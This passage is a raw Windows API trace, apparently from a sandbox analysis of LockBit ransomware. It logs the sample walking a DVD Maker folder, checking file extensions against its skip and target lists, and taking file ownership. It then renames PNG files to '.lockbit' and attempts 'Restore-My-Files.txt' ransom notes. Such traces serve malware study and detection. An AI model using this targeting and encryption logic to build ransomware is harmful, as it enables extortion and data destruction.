returned=".png" [0087.549] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.549] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.549] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.549] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.550] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.550] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.550] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.550] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.550] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.550] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.550] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.550] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.550] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.550] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png.lockbit") returned 100 [0087.550] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.550] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.551] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.551] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.551] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.551] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.551] RtlFreeAnsiString (AnsiString="\\") [0087.551] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c8) returned 0x0 [0087.552] malloc (_Size=0x200) returned 0x77d800 [0087.552] NtQueryInformationToken (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.552] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.552] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.552] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.552] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.553] CloseHandle (hObject=0x3c8) returned 1 [0087.553] free (_Block=0x77d800) [0087.553] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c8 [0087.553] CreateIoCompletionPort (FileHandle=0x3c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.553] malloc (_Size=0x40068) returned 0x3e700e8 [0087.553] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x3e70100 | out: lpFileSize=0x3e70100*=3118) returned 1 [0087.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb011c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb011c) returned 0x0 [0087.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.555] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb012c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb012c) returned 0x0 [0087.555] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.563] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.563] malloc (_Size=0xde) returned 0x1ff1e60 [0087.563] NtSetInformationFile (FileHandle=0x3c8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xde, FileInformationClass=0xa) returned 0x0 [0087.564] free (_Block=0x1ff1e60) [0087.564] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.564] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.564] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.564] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff6f52e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff6f52e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.564] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.564] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.565] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0087.565] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.565] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.565] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.565] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.566] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.566] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.566] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.566] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.566] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.566] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.566] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.566] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.567] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.567] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.567] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.567] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.567] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.567] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.567] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.567] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.567] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.567] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png") returned=".png" [0087.567] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.567] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.567] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.567] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.568] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.568] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.568] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.568] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.568] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.568] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.568] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.569] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.569] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png.lockbit") returned 91 [0087.569] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.569] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.569] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.569] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.570] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.570] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.570] RtlFreeAnsiString (AnsiString="\\") [0087.570] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0087.570] malloc (_Size=0x200) returned 0x77d800 [0087.570] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.570] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.570] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.570] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.571] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.571] CloseHandle (hObject=0x3c0) returned 1 [0087.571] free (_Block=0x77d800) [0087.571] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0087.571] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.572] malloc (_Size=0x40068) returned 0x1ff1e60 [0087.573] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4955) returned 1 [0087.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0087.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0087.574] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0087.586] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.586] malloc (_Size=0xcc) returned 0x77d800 [0087.586] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0087.587] free (_Block=0x77d800) [0087.587] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.587] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.587] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.587] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ffbb7e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ffbb7e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0087.587] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.587] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.587] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0087.587] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.587] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.587] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.588] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.588] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.588] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.588] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.588] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.588] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.588] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.588] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.589] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.589] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.589] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.589] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.589] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.589] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.589] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.589] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0087.589] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0087.589] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.589] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationUp_SelectionSubpicture.png") returned=".png" [0087.589] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.589] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.589] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.589] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.590] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.590] 